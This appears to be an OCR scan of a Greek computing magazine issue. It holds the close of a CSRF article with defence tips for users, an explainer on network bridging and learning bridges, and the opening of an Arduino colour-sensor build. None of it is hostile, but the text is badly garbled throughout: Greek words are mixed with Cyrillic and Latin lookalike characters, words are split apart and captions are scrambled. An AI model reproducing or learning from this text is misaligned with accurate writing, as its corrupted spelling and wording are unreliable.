θεση µε τη σελίδα csrfi.html. Όπως θα διαπιστώσετε, η επίθεση θα αποτύχει ка o 
λογαριασμὸς του θύματος θα παραμείνει αναλλοἰωτος. 


Άμυνα για τους χρήστες 


Н επιτυχἰα ἡ η αποτυχία µιας επίθεσης CSRF δεν καθορἰζεται μόνο апо τον κὠδικα 
του εκάστοτε Website. Oi απαιτούμενοι μηχανισμοί προστασίας ενδέχεται να опар- 
χουν, αλλά µπορεί και να 'vai ελλιπεἰς ἡ ακόµη και να απουσιάζουν παντελῶς. Eno- 
μένως, μεγάλο μερίδιο ευθύνης ἐχει κι ο εκάστοτε χρήστης. Ας δούµε μερικὲς аплес 
αλλά χρήσιμες συμβουλές. 


1. Κάντε πάντα Logout. Οι επιθέσεις CSRF απαιτούν τη σύνδεση του θύματος 
με το ευπαθὲς website. Μην τους κάνετε τη χάρη! Όταν τελειώνετε την εργα- 
oid σας σε κἄποιο website, φροντίστε πάντα να κάνετε αποσύνδεση. Αυτό on- 
раім oT! θα πρέπει να ξεχάσετε και το κουμπάκι "να µε θυμάσαι" (remember 
те). 


2. Anoppiwn δεδομένων περιήγησης. Οι σύγχρονοι browsers προσφέρουν 
την επιλογἡ της αυτόματης απὀρριψης (της µη αποθήκευσης) rov στοιχείων 
περιήγησης και κατ' επέκταση των cookies. AUTO το џетро βέβαια εἶναι λίγο 
ακραίο, καθὼς o browser δεν θα θυμάται ποτὲ και τίποτα апо оса камате. 
Μπορείτε όμως va το εφαρµόὀσετε μόνο σε ἑναν апо τους εγκατεστηµένους 
browsers του συστήµατος. Αργότερα, θα χρησιμοποιείτε τον συγκεκριμένο 
browser yia τη σύνδεση στα κρίσιμα websites (web banking, PayPal κ.λπ.) και 
κάποιον ἀλλο για την περιήγηση στα υπόλοιπα sites. Στον Firefox, η ρύθμιση 
που περιγράφουμε επιτυγχάνεται ακολουθώντας τη διαδρομή Tools > Options 
> Privacy > History κι επιλέγοντας "Never remember history". Στον Chrome 
µπορείτε ма χρησιμοποιείτε το λεγόμενο Incognito mode. Πατήστε To κουμπὶ 
του μενού πάνω δεξιά και επιλέξτε "New incognito window". Προσοχή: Αυτό то 
μέτρο λειτουργεὶ βοηθητικἁ και δεν каблота την περιήγηση απόλυτα ασφαλή. 


3. Ενημερωθείτε yia ro phishing. Κανένας δεν γνωρίζει όλα τα кема асфа- 
Лелас που υπάρχουν ἡ ενδέχεται να προκύψουν στους browsers και στα διά- 
фора websites. Επομένως, εἶναι πολὺ σηµαντικὀ να αντιλαμβάνεστε £ykaipa 
τις πιθανὲς προσπάθειες εξαπάτησης. Па To σκοπὀ αυτό θα σας προτείναμε 
να διαβάσετε τα ἄρθρα "Πώς να µην πιαστεἰτε στον... EUnvio" (τεύχος 018) 
και "Opa για πσάρεμα" (τεύχος 014). Επίσης, κάνετε πὀτε πὀτε και µια βόλτα 
ano TO http://securitycartoon.com, ὀπου υπάρχει Eva ωραίο кошк µε θέμα то 
phishing :D 


ЕпіЛоүос̧... 


Οι επιθέσεις CSRF στηρἰζονται σε ша апл και σχετικἀ εὐκολα υλοποιήσιμη ιδέα. 
Όπως εἰδατε, катафераџе να πραγµατοποιήσουµε επιθέσεις χρησιμοποιώντας TIG 
μεθόδους СЕТ και POST, χωρίς να αντιμετωπίσουμε κάποιο ιδιαίτερο πρὀβλημα. 
Μπορείτε να μελετήσετε τον κώδικα που γράψαμε, алла θα σας протемаџе ма σκε- 
@TEITE ro πρόβλημα και μόνοι σας, ónog επἰσης και να δοκιµάσετετις δικὲς σας ιδέες 
για την αντιμετώπισή του. Еџејс πάντως θα χαρούμε πολὺ να ακοὐσουμετις σκέψεις 
σας, στα γνωστὰ στέκια επικοινωνίας του περιοδικού. Μέχρι την επόμενη διαδικτυ- 
акй µας περιπέτεια... stay secure! 
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Οι δικτυακἑς γέφυρες, αλλά ano την αρχἠ 


Στον κόσμο των δικτύων υπάρχουν κάποιες τεχνολογἰες για τις οποίες 
ναι μεν μπορεῖ κάποτε να έχεις ακούσει кап, ωστόσο NOTE δεν τους ἐχεις 
δώσει σημασῖα για πάνω ano 8 δευτερόλεπτα. Κι όμως, αν τύχει και μάθεις 
καλύτερα σε TI αφορούν, τότε συναρπάζεσαι ano τις πιθανὲς εφαρμογές και 
η ἀποιμή σου για To τι εἶναι, π.χ., TONIKO δίκτυο, αλλάζει για πάντα. Νομίζετε 
ότι υπερβάλλουμε; Ελάτε μαζί µας σε µια ξενάγηση o' Eva Tonio ónou 
επικρατούν οι γέφυρες — και μετὰ ra ξαναλέμε :) 


by subZrau 


01 δικτυακές γέφυρες, 


αλλά από την αρχή 


Αα «ή 


Το modem που ἐχετε στο σπίτι σας ката 
πᾶσα πιθανότητα εἶναι Ἔκαιξ дроџоло- 
уптпс (router). Εἶναι μάλιστα τόσο ou- 
νηθισµένα τα επονομαζόμενα тодет/ 
routers, που συχνά μιλάμε µόνο ма 
modem ἡ μόνο yia router και στην 
πραγματικότητα εννοούμε µια συσκευἠ 
που ενσωματώνει τις λειτουργίες και των 
δύο. Мерка χρόνια πριν, πάντως, δεν 
ἦταν καθόλου παράξενο ма βάζει kå- 
ποιος νέα σύνδεση Ίντερνετ, κι απὀ τον 
ISP να παίρνει ¿va σκέτο (DSL) modem. 
Av ο ἰδιος "κάποιος" ἠθελε Ίντερνετ yia 
емам υπολογιστή και μόνο, τότε Муо — 
av ox! καθόλου-- ενδιαφερόταν για το 
ότι διαθέτει Eva anAó μοντεμάκι, χωρίς 
δυνατότητες routing (και xwpic firewall). 
Av оџос κάποια στιγµή επιθυμούσε va 
μοιράσει το Ίντερνετ σε περισσότερα 
ano éva μηχανήματα, τότε εἶτε ауора- 
ζε емам ξεχωριστὸ router --ενδεχομέ- 
νως και µε δυνατότητες wireless—, εἶτε 
µετέτρεπε έναν ολόκληρο υπολογιστή 
σε router. Σε κάθε περίπτωση, η ιδέα 
εἶναι ὁτι στην πρώτη γραμμή ἐχουµμε то 
тодет, το опојо βλέπει απευθείας το 
Ίντερνετ, nioo and το modem ἐχουμε 
TOV router, που εἶναι αυτόνομη συσκευἠ 
ἡ υπολογιστής, ενώ πίσω ano τον router 
έχουμε ἑναν ἡ περισσότερους υπολογι- 
στὲς ἡ συσκευές, οι οποίοι χάρη στον 
router μπορούν να επικοινωνούν μεταξύ 
τους алла και να βγαΐνουν στο Ίντερνετ 
μοιραζόμενοι, ουσιαστικά, ша και μόνο 
σύνδεση (broadband). 


Σημείωση. H ἕως τώρα εισαγωγή 
μάλλον φαντάζει περιττή —ау Ox! na- 
ράξενη--, για ἑνα арбро µε беџа то 
bridging. Κρίνεται όμως ano τον ура- 
φοντα ως απαραίτητη για ша ομαλή 
προσέγγιση στο ὁλο θέµα, ειδικἀ ano 
τη στιγμὴ που то περιοδικὀ το διαβά- 


Internetió 
(aka The Internet) 


“> modem 


router 


((9)) = 
wireless switch LOS 
access Xs =~ 
point p. J DA 


I 4 4 


wireless client 


«— wired clients ————> 


Σχήμα 1 

Στο δρόµο προς ro Internet, oi υπολογιστὲς 
ενός τοπικού δικτύου συναντούν Eva wireless 
access point (WAP) κι ἑνα switch, µετά ката- 
λήγουν ὁλοι στον router, εκείνος μιλάει µε то 
modem κι αυτό, µε τη ора του, διατηρεί τη 
σύνδεση στο Internet. Στην πλειονότητα των 
οικιακών τοπικών δικτύων, το WAP ката πάσα 
πιθανότητα ενσωματώνεται ano Tov router, 
ενώ στη θέση rou switch ἐχουμε µια γέφυρα η 
οποία, ипо μία £vvoia, οµαδοποιεί то WAP µε 
τα Ethernet ports Tou router. Επίσης, ο router 
μάλλον ενσωματώνει kai TO modem. Αν τώρα 
σκοπεύετε να γυρίσετε την πλάτη στη συσκευἠ 
"όλα а' Eva" που σας ἐδωσε ο ISP σας και va 
φτιάξετε τον δικό σας uriép-router, τότε ката 
πάσα πιθανότητα θα στήσετε ki Eva bridge. 
Λεπτομέρειες επ’ αυτού στο άρθρο που αρχίζει 
σπὀ τη σελίδα 40. 


ζουν και φίλοι χωρίς τις γνώσεις που για άλλους θεωρούνται δεδομένες. Προς 
τους φίλους που τώρα μαθαίνουν, λοιπόν, συστήνουμε υπομονή, επιμονή και 
φυσικά διαρκή πειραματισμό. Τους υποσχόµαστε OTI, поло πιο σύντομα απ’ 
όσο φαντάζονται, θα εἶναι σε θέση να καταλαβαίνουν πολλά περισσότερα ап' 
όσα καταλαβαίνουν αυτή τη στιγµή. Στους υπόλοιπους φίλους, συστήνουμε 


апла υπομονή :P 
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wr 


[ Quick Setup | [. Status 


Eikóva 1 

To bridge nou υλοποιεί то modem/router nou ёҳоиџ ano τον ISP µας, бдпос φαίνεται апд то 
web panel της συσκευής. Όπως βλέπετε, γεφυρώνει тёсоєра Ethernet ports και ro wireless 
access point. 


Σήμερα, πάντως, εἶναι σχεδὸν βέβαιο OT! όλοι διαθέτουμε modem που ταυτόχρονα 
εἶναι *kai* router. Πιθανὼς μάλιστα ενσωματώνει κι ασύρματο access point (wireless 
access point ἡ WAP), evo пера ano τη θύρα WAN, πάνω στην οποία ἔχουμε το Ka- 
λώδιο της ιντερνετικἠς σύνδεσης, υπάρχουν ша ἡ και περισσότερες θύρες LAN για 
τους ενσύρματους πελάτες (clients). Αν тора το modem/router έχει uia µόνο θύρα 
LAN, αλλά еџејс θέλουμε να συνδέσουμε περισσότερους апо гмам υπολογιστές EV- 
σύρματα, τότε στην εν λόγω θύρα βάζουμε Eva switch. Ένα τυπικὀ switch διαθέτει 
τἐσσερις θύρες, ара αμέσως αμέσως πάνω στο modem/router μπορούμε να ἔχουμε 
ἑως και τἐσσερις ενσύρματα συνδεδεμένους υπολογιστὲς -- και µην ξεχνάτε και τις 
συσκευὲς που συνδέονται ασύρματα. 


Πάρτε тора Eva modem/router που δεν Exe! WAP αλλά διαθέτει περισσότερες ano 
ша θύρες LAN (συγκεκριµένα, πρὀκειται yia Ethernet ports). Ακόμη και σ' аџто pno- 
ρούμε να προσθέσουμε Eva ἡ περισσότερα switches, καταλαβαίνουμε ὁμως OTI για 
αρκετὲς περιπτώσεις/σενάρια δεν εἶναι απαραἰτητο. Ας αφήσουμε λοιπόν τα switches 
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στην ἄκρη KI ας αναλογιστούμε το εξἠς: 
Η συμπεριφορά όλων των Ethernet ports 
του modem/router, παραπέμπει στη συ- 
μπεριφορὰ ενὸς switch. Εἶναι μάλιστα 
λογικὀ να υποθέσουμε от η συσκευἠ 
έχει ενσωματωμένο κάποιο switch, 
ωστόσο αυτό δεν ισχύει: Μπορεί όλες 
μαζί οι θύρες πράγματι να συμπεριφἑρο- 
νται ως Eva switch, στην праүратікӧтп- 
τα ὁμως εἰναι *uóvo* λογικά γεφυρωμὲ- 
vec. Με τον ὀρο "λογικά", εννοούμε от! 
δεν υπάρχει κἀποιο ἐξτρα hardware που 
τις γεφυρώνει: Το λειτουργικὀ σύστημα 
του modem/router τρέχει κατάλληλο Ào- 
γισμικὀ, το οποίο αναλαμβάνει να κάνει 
TO εν λόγω γεφύρωμα. Av και, διαισθη- 
TIKG τουλάχιστον, καταλαβαίνουμε τι πε- 
ρἰπου εἶναι αυτό ro γεφύρωμα (bridging) 
που ξαφνικά βάλαμε στην κουβέντα µας, 
προφανώς δεν έχουμε ακόμα εξηγήσει 
επαρκώς пер! τίνος πρὀκειται. Σε λίγο θα 
το κάνουμε, ὁμως προς то паром λάβετε 
υπόψη ὁτι bridging δεν γίνεται μόνο pE- zu 

А : : 4 χήμα 2 
таёр network interfaces! του ἰδιου τύπου Σχηµατική αναπαράσταση µιας συσκευής bridge, 
(n.x., Ethernet interfaces). Πράγματι, που γεφυρώνει τρία óiapoperiká топка δίκτυα. 


bridge 


; | : - Ta bridges εἶναι πιο εξειδικευμένα ano ra 
калота Baer Ме ο ώς die routers кал λειτουργούν στα δύο прота επίπεδα 
џема κάποια Ethernet interfaces μαζὶ µε του μοντέλου OSI (physical layer και data link 
ἑνα n περισσότερα wireless interfaces. layer), ακριβώς като ano то επίπεδο όπου λαμ- 
Στην πραγματικότητα, αυτό ακριβώς βάνει χώρα ΤΟ routing (network layer). 


συμβαίνει σε кадг (modem) router που 

εἶναι wireless access point κι έχει τουλάχιστον Eva Ethernet port: Όλα ra network 
interfaces yia τους πελάτες, εἶναι πράγματι γεφυρωμένα. Το γεγονὸς аџто ἰσως pai- 
νεται κι апо то web panel rou router σας (βλ. εικὀνα 1). 


Σε каде περίπτωση, OAO! οι υπολογιστὲς ἠ/και οι συσκευές που συνδέονται EVOÜUD- 
рата ἡ ασύρματα πάνω στον ідо router, ¿xouv διευθύνσεις IP της αυτής џорфпс, 
δηλαδἠ διευθύνσεις апо το ἰδιο subnet (n.x., 192.168.1.x ἡ 10.0.0.x κ.ο.κ.). Τις δι- 
ευθύνσεις IP εἶναι πολὺ πιθανὸ va τις μοιράζει αυτόματα ο λεγόμενος DHCP server 
της συσκευἠς. Όπως και ма 'χει, η δρομολόγηση ἠ/και το џограоџа διευθύνσεων 
γίνονται апо va κοινὸ, εικονικό network interface: Εἶναι αυτό του λεγόμενου bridge 
interface, το οποίο "ενώνει" όλα τα ἄλλα network interfaces, ασχέτως αν εἶναι 
wireless ἡ wired. Και ша телеџтаја παρατήρηση: Δεν εἶναι υποχρεωτικὀ Оті, σε каде 
router, όλα ra network interfaces yia τους clients εἶναι γεφυρωμένα μεταξὺ τους. 
Μπορεἰ, π.χ., να στήσετε τον δικὀ σας router µε то pfSense ἡ µε то OpenBSD (εντε- 
^oc τυχαία παραδείγματα :D) και να µη γεφυρώὠσετε τίποτε ἡ να φτιάξετε παραπάνω 
ano ша γέφυρες (bridge groups, опос ονομάζονται). Πάντως σε емам απλὀ, τυπικὀ 
(οικιακό) router, θα υπάρχει Eva και џомо bridge. 


1. О όρος "interface", ὁπως τον χρησιμοποιούμε στο паром κείµενο, афора oro noc βλέπει ro software To hardware. Για παράδειγµα, Οἱ 
εφαρμογές επικοινωνούν µε µια карта Ethernet µέσω του αντίστοιχου Ethernet interface, µε µια карта ασύρματης δικτύωσης µέσω του avri- 
στοιχου wireless interface κ.ο.κ. 
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To bridging, Aiyo nio комта 


Γενικά, μπορούμε να πούμε оті TO bridging ορἰζεται ως η TEXVIKN nou επιτρέπει 
σε δύο ἡ περισσότερα топіка δίκτυα (LANs) να συγκροτούν Eva ευρύτερο, ενιαίο 
δίκτυο. Παρατηρήστε oT! το routing εἶναι κάτι γενικότερο, αφού αυτό επιτρέπει 
σε δύο ἡ περισσότερα δίκτυα να επικοινωνούν μεταξύ τους παραμένοντας, όμως, 
εντελώς ανεξάρτητα. Πράγματι, To bridging λαμβάνει хора στα δύο прота επἰπεδα 
του μοντέλου OSI (physical layer kai data link layer), ακριβώς *kaTw* апо το eni- 
πεδο ὁπου λαμβάνει хора ro routing (network layer). To bridging επιτυγχάνεται ano 
hardware ἡ ano software. Τα практіка παραδείγματα nou δείχνουμε στο арбро της 
σελἰδας 40, αφορούν αποκλεστικἁ σε υλοποιήσεις software. 


Στο σηµείο αυτό, Aoyikó εἶναι v' αναρωτηθεἰ κἀποιος то εξἠς: Avri να έχουμε Eva 
bridge μεταξὺ δύο ἡ περισσοτέρων δικτύων, утат! να va µη φτιάξουμε апо την архп 
ἑνα μεγαλύτερο δίκτυο, που να περιλαμβάνει τα eni μέρους; Υπάρχουν διάφοροι 
λόγοι — και παραθέτουμε τρεις апо τους κυριότερους. 


Αξιοπιστία. Μια οποιαδήποτε βλάβη σ' Eva (охепка) μεγάλο τοπικὀ δίκτυο, θα ἐχει 
ως αποτέλεσµα την αδυναμία επικοινωνίας μεταξὺ όλων των μελών TOU. Αν, апо την 
ἄλλη, έχουμε δύο ἡ περισσότερα YEMUPWHEVA δίκτυα, τότε πιθανή βλάβη σε κάποιο 
δἰκτυο δεν θα επηρεάσει αρνητικἁ τη δυνατότητα επικοινωνίας μεταξύ των μελῶν 
ἄλλων δικτύων. 


Επιδόσεις. Όσο μεγαλώνει Eva δίκτυο, μ' ἄλλα λόγια ова περισσότερα μηχανήματα 
και συσκευές συμμετέχουν σ' αυτό, τόσο περισότερο μειώνονται οι επιδόσεις TOU. 
Mia καλἠ πρακτικἠ εἶναι ма οργανώνουµε μηχανήματα και συσκευὲς σε ξεχωριστὰ 
δίκτυα, WOTE η ενδοδικτυακἠ κίνηση πακέτων να εἶναι σχεδὀν πάντα μεγαλύτερη 


Εικόνα 2 

Εγκαταστήσατε το λειτουργικό της αρεσκείας σας στον ὠραιότατο --αλλά και памохиро— 
router που φτιάχνετε, ολοκληρώσατε και τις βασικές ρυθμίσεις. Μένει να στήσετε και то 
bridging, ώστε σε οποιαδήποτε ano τα διαθέσιµα Ethernet ports κι αν συνδέετε κάποιον client, 
аитос να παίρνει ІР ano το Κοινό pool που διαχειρίζεται о DHCP server Tou router. Φυσικά, 
όλοι οἱ clients θα μπορούν να επικοινωνούν μεταξύ τους και να βγαίνουν στο Internet — гктос 
βἐβαια κι αν προσθέσετε κάποιον περιοριστικὀ κανόνα στο firewall. 
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Ώι δικτυακές γέφυρες, αλλά από την αρχή 
κά“ 


ano τη διαδικτυακή2. Βεβαίως, ακριβὠς επειδἠ σε πάμπολλες περιπτώσεις εἶναι επι- 
θυµητἠ *kal* αυτή η διαδικτυακἠ επικοινωνία, τα επιµέρους δίκτυα γεφυρώνονται. 


Ασφάλεια. Αναλόγως του περιβάλλοντος, емтос του ἴδιου οργανισμού εἶναι πολύ 
καλὴ ιδέα να "χουμε ξεχωριστά δίκτυα για χρήστες που κάνουν εντελὼς διαφορε- 
TIKÉG εργασἰες ἠ/και ἐχουν εντελώς διαφορετικούς ρόλους. Σε µια εταιρεία, N.X., 
εἶναι πιθανὀ να συναντήσουμε Eva шкро (ενσύρματο п/ка: ασύρματο) δίκτυο ма 
τους επισκέπτες, ДАЛО Eva για τη γραματεία, ἆλλο για ὀσους εμπλέκονται µε том 
στρατηγικὀ σχεδιασμό (aka "τα αφεντικἀ" ἡ "οι апо πάνω"), ξεχωριστό δίκτυο για то 
marketing, ἀλλο yia το λογιστήριο κ.ο.κ. Ορισμένα ἡ και όλα ano αυτά τα διαφορε- 
тіка δίκτυα εἶναι πιθανό να επικοινωνούν μεταξύ τους, ἑστω και UNO περιορισμούς. 
(Στο παιχνἰδι, βλέπετε, μπαίνουν και ra firewalls.) 


Πώς δουλεύει το bridging; 


О ρόλος емос bridge interface, ασχέτως αν υλοποιείται ano hardware ἡ software, 
εἶναι να γεφυρώνει ιδεατὰ δύο ἡ περισσότερα network interfaces, καθένα апо τα 
опоја ορἰζει Eva διαφορετικὀ δίκτυο. To bridge πετυχαίνει аот τη λογική σύνδεση 
προωθώντας επιλεκτικά κάποια frames апо Eva οποιοδήποτε δίκτυο στα ἄλλα õi- 
κτυα (rou ἴδιου bridge group). Δικαιούμαστε να φανταζόµαστε ὅτι τα bridges συγγε- 
νεύουν µε та hubs, αρκεἰ να έχουμε κατὰ vou Ori ra bridges εἶναι πολὺ πιο έξυπνα. 
Πράγματι, ἑνα δημοφιλὲς εἶδος bridge εἶναι το λεγόμενο learning bridge, το οποίο 
παρακολουθεἰ διαρκώς ra headers των εισερχόμενων frames κι έτσι μαθαίνει, σιγὰ 
σιγἁ, ποιοι υπολογιστὲς βρίσκονται σε καθένα апо ra δίκτυα που γεφυρώνει. 


Παρακολουθήστε λίγο noc αντιδρὰ ёха learning bridge, отау βλέπει Eva εισεργὀµε- 
vo frame. To прото πράγμα που κάνει εἶναι να Ψιλο-εκνευριστεί, αφού ησυχία δεν 
βρίσκει kai κάθε Муо και λιγάκι βρίσκεται κάποιος nou το "τρέχει". Πιστὀ ωστόσο στο 
καθήκον rou, ξεφυσά και σημειώνει το δίκτυο апо το οποίο προέρχεται ro frame, 
καθὼς και τη διεύθυνση του υπολογιστή ο οποίος το ἐστειλε. Av тора ro bridge δεν 
ἐχει ιδέα yia το NOU εἶναι το δίκτυο µέσα στο οποίο βρίσκεται o υπολογιστἠς yia том 
onoio προορἰζεται то frame, λέει κάτι σαν "ооф, аџам πια μ' αυτή την αβεβαιότητα" 
και προωθεί ro frame σ' όλα ανεξαιρέτως τα δίκτυα που γεφυρώνει. Αν, πάλι, KOI- 
τάζοντας τις σημειώσεις του, δει от! TO frame εἶναι ма πάει σε συγκεκριμένο δίκτυο, 
διαφορετικὀ απ' αυτό που ξεκίνησε, τότε χαρούμενο που δεν θα προκαλέσει περιττή 
αὐξηση της κυκλοφορίας στέλνει το frame απευθείας προς та εκεἰ που πρέπει. Av, 
τέλος, то frame δεν εἶναι για να φύγει апо το δίκτυο апо то onoio ξεκίνησε то ταξίδι 
του, τότε TO bridge θα χαμογελάσει σκανδαλιάρικα και да то anoppiwel. "Ααααα, δεν 
ξέρω, το μηχάνημα yia το οποίο προορἰζετα! то frame εἶχε каде ευκαιρἰα να το δει 
και να το πάρει και ма το βράσει! Av ropa κοιμόταν ἡ δεν-ξέρω-κι-εγώ-τι, δικὀ του 
πρόβλημα", λέει, κι ελπίζει στα επόμενα δέκα χιλιοστά του δευτερολέπτου να pno- 
ресе! να πάρει Evav оипмако που τόσο πολύ θα ἠθελε. 


Με ἡ χωρἰς τις μεταφορὲς σε καθημερινὲς καταστάσεις, vouicouus Ori η λειτουργία 
αλλά και η αποστολἠ των bridges ἐχουν πλέον γίνει катамоптес. 


Σημειώστε και κἀτι τελευταίο, που αφορά στην ασφάλεια. Ορισμένες υλοποιήσεις 
bridges, πριν προωθήσουν va frame κοιτάζουν прота αν περιλαμβάνει Eva IPv4 
ἡ IPv6 datagram. Αν πράγματι περιλαμβάνει, τότε το πακέτο υπόκειται και στους 
ελέγχους του ὀποιου firewall. Χάρη ota bridges και στα firewalls, λοιπὀν, εἶναι ðu- 


2. Παρατηρήστε ὁτι δεν χρησιµοποιήσαμε το κεφαλαίο δέλτα, µιας και δεν αναφερόμαστε στην επικοινωνία апо και προς το Διαδίκτυο 
(Internet) αλλά στην επικοινωνία μεταξύ διαφορετικών, τοπικών δικτύων. 
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νατὀν ма φτιάχνουμε NEPINAOKOUG κανόνες WOTE, N.X., μόνο Eva μηχάνημα апо то 
λογιστήριο να µπορεί να φτάνει στα μηχανήματα TOU τμήματος μάρκετινγκ κ.ο.κ. 


Στην πράξη 


Πηγαίνετε ropa στο άρθρο που αρχίζει апо τη σελἰδα 40, ὡστε να δείτε πὼς υλοποι- 
οὐμε bridges като ano δύο διαφορετικά λειτουργικά συστήματα, ro pfSense και то 
OpenBSD, τα οποία αμφότερα εἶναι ἀριστα yia τη δημιουργία πανἰσχυρων κι εξαιρε- 
TIKG EU£AIKTOY routers/firewalls. 


Υπάρχει εξάλλου και µια χρήση rou bridging που αποδεικνύεται ιδιαίτερα βολικἠ 
σε ὁσους ασχολούνται µε то penetration testing ἡ ἑστω σε εκείνους nou παἰζουν 
κι εξερευνούν, αν µη τι ἆλλο ма ν' αποδεικνύουν σε γνωστούς και φίλους OT! δεν 
εἶναι τόσο ασφαλείς Ooo νομἰζουν. Πολλά περισσότερα επ' αυτού στο ἀρθρο που 
ξεκινά апо τη σελἰδα 64 του παρόντος τεύχους, στο οποίο συζητάμε για το λεγό- 
μενο wireless bridging και βλέπουμε, αναλυτικἁ και βήμα προς βήμα, πόσο EUKOAEG 
καθιστά τις επιθέσεις Man-in-The-Middle. Πραγματοποιούµε βεβαίως και σχετικἠ eni- 
δειξη, µέσα ano το Kali Linux. 


Καλή σας διασκέδαση! 


General 
System 


Display 
Storage Enable Network Adapter 


Audio Attached to: |Bridged Adapter v 


Network Name: |Intel(R) Gigabit CT Desktop Adapter Y 


Serial Ports ν Advanced 


USB Adapter Type: |Intel PRO/1000 T Server (82543GC) Y 
итен азса 


MAC Address: 080027E4EE38 & 


Port Forwarding 


Εικόνα 3 

To bridging ката паса πιθανότητα ro ἐχετε δει εν δράσει στον hypervizor nou χρησιµοποιείτε — акд- 

µη ki αν δεν ἐχετε δώσει TN δέουσα προσοχή. Хто screenshot βλέπουμε τις ρυθμίσεις δικτύωσης EVOG 
VirtualBox УМ. O Adapter 1 εἶναι τύπου "Bridged", γεγονός που σηµαίνει ὁτι µε то που ενεργοποιείται η 
εικονική μηχανή ro VirtualBox γεφυρώνει αυτόματα τον εικονικὀ µε κἀποιον апо τους φυσικούς network 
adapters του host computer. Πρακτικὀ αποτέλεσμα: To VM θα ανήκει στο ідо τοπικό δίκτυο που ανήκει o 
host και θα βλέπει τον φυσικό router που επίσης βλέπει o host. 
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Τα επεισόδια του deltaCast, μοιάζουν µε ταινίες. 
Στη διάρκεια -- OXI στην ποιότητα. 
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Skill: Beginner 
Tags: photocell, RGB LED, normalization 
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Αναγνώριση Χρωμάτων µε To Arduino 
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Μήπως θέλετε να κατασκευάσετε гма απλὀ роџпотак! που κινεῖται 
ακολουθώντας ша γραμμή στο δάπεδο; Μήπως κάποιο εξελιγμένο, που 
ακολουθεί Eva συγκεκριµένο χρώμα; Μήπως πάλι θέλετε μόνο vav απλὀ 
τρόπο yia να διαβάζετε τα χρώματα των φυσικών αντικειμένων, ὥστε να та 
αναπαράγετε στον υπολογιστή; Σε κάθε περίπτωση, χρειάζεστε vav απλὀ 
αισθητήρα χρωμάτων. Κάτι τέτοιο χρειαστήκαμε κι εμεὶς — κι αποφασίσαμε 
ма TO κατασκευάσουμε. 


E T | |!» |] „= „2 / f | 1 ΣΙΝ 


Ηναγνώριση χρωμάτων pe to Arduino 
LLL 


Κατὰ καιρούς έχουμε δει πολλὲς катаскеџес µε TO Arduino κι έχουμε επιστρατεύσει 
διάφορους αισθητἠρες. Βέβαια, τα εξαρτήματα που χρησιµοποιούσαμε Tav σχε- 
διασμένα για ша απλἠ λειτουργία, evo μπορούσαν να συνδεθούν και να επικοινω- 
νήσουν µε ro Arduino χωρίς Kono. Οι αισθητἠρες αυτοί, ανάλογα µε τη Aerroupyia 
αλλά και την εσωτερικἠ πολυπλοκότητἁ τους, στοἰχιζαν and ελάχιστα μέχρι και 
αρκετὲς δεκάδες ευρώ. Σε µια κατασκευαστικἠ περιπέτεια —апо εκεἰνες στις οποἰες 
о γράφων μπλέκει πολὺ cUXvà— χρειάστηκε να επιστρατεύσουμε vav ανιχνευτἠ 
χρώματος. Момо που το κόστος για Eva τέτοιο εξάρτημα ἠταν аркета υψηλό, evo 
το πακέτο θα αργούσε να φτάσει. Κάπως ἐτσι, αναγκαστήκαµμε να ψάξουμε για ша 
εναλλακτική λύση και η αλήθεια εἶναι OT! την βρήκαμε αµέσως. Па να µην ra no- 
λυλογούμε, αποφασἰσαµε να φτιάξουμε μόνοι µας ἑναν αισθητήρα για τον εντοπι- 
σμό/αναγνώριση των χρωμάτων, ξοδεύοντας ελάχιστα ευρώ. Н υλοποίηση nou θα 
παρουσιάσουμε θα βασιστεί σε υλικά που, λίγο πολύ, υπάρχουν στο συρτάρι όλων 
εκείνων που ασχολούνται µε τα плектромка. Σε аџто το άρθρο, λοιπὀν, θα δούμε 
την κατασκευή του αισθητήρα και θα πούμε δυο Хоџа και για τη Φυσική που κρύβε- 
ται πίσω ano την λειτουργία του. Πριν ξεκινήσουμε, ὅμως, νοµίζουµε Оті πρέπει va 
μιλήσουμε Муо παραπάνω yia το τι ακριβώς σκοπεύουμε ма κάνουμε — και για то 
noc θα το πετύχουμε. 


Λίγη θεωρία 


Χρειαζόμαστε ша συσκευή η οποία, µε 
κάποιον τρόπο, θα αναγνωρίζει το χρώμα 
του αντικειμένου που βρίσκεται μπροστὰ 
της. Δεν ζητάμε μεγάλη ακρίβεια στον 
προσδιορισμὀ του χρώματος, αλλά μόνο 
µια εκτίμηση και, κυρίως, την ικανότη- 
τα διάκρισης μεταξὺ διαφορετικών XW- 
μάτων. Βλέπετε, δεν σκοπεύουμε va τη 
χρησιμοποιήσουμε yia να ρυθµἰσουμε 
κάποιο monitort, αλλά yia να δώσουμε 
τη δυνατότητα στο Агашпо να ξεχωρἰζει 
το "κόκκινο" απ' το "πράσινο":. Mia λύση 
θα ἦταν ма ξοδέψουµε 10 µε 15 ευρώ, ма 
περιμένουμε γύρω στον Eva µήνα και va 
κάνουμε την δουλειὰ µας ευκολότερα — 
αλλά OX! µε μεγαλύτερη ακρἰβεια! Nopi- Θα μπορούσαμε να αγοράσουμε £vav αισθητήρα 
ζουμε όμως ότι μας ξέρετε αρκετά кала: е ud GINE acad prend ds 
Bosne κα wr ἄλλες TOv püorong ο аапробан Va φπόξουμε τον id µας αοθητἠρα 
Κριτήριο δεν εἶναι η ψευτομαγκιά αλλά η πρακτικὀτητα, TO κόστος — και φυσικά 
η "ποιότητα" του τελικού αποτελέσματος. Επομένως, ам πρὀκειται να ξοδέψουμε 
λεφτά και να πετύχουμε то αποτέλεσµα που θα петохамаџе µε λίγη παραπάνω δου- 
Ла апо μέρους µας, θα επιλἐξουµε το δεύτερο. 


Н λύση στο πρὀβλημά µας εἶναι аркета απλἠ kai то κυριότερο εξάρτημα που θα χρει- 
αστούμε εἶναι гема photocell, ἡ αλλιώς φωτοκύτταρο». Πρόκειται για ша αντίσταση 


1. Για την ιστορία, о nio npoorróc αισθητήρας για τη χρωματική ρύθμιση ενός monitor στοιχίζει γύρω στα 150 δολάρια, µε αρκετά μοντέλα να 
ξεπερνούν το χιλιάρικο! 

2. Μήπως έφτασε η фра να σχεδιάσουμε κι Eva Rubic's Cube solver bot; Χμ... 

3. Та ἴδια εξαρτήματα ονομάζονται και LDR (Light-Dependent Resistors) ἡ Photoresistors. Το γιατί θα φανεί σύντομα ;) 
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nou η τιμὴ της μεταβάλλεται ανάλογα µε 
την ένταση του φωτός που πέφτει επάνω 
της. Έτσι, ма να εκτιμήσουμε την емта- 
ση του φωτός, арке! να μετρήσουμε την 
αντίσταση rou photocell. Όπως karaAa- 
βαΐνετε, τα συγκεκριµένα εξαρτήματα 
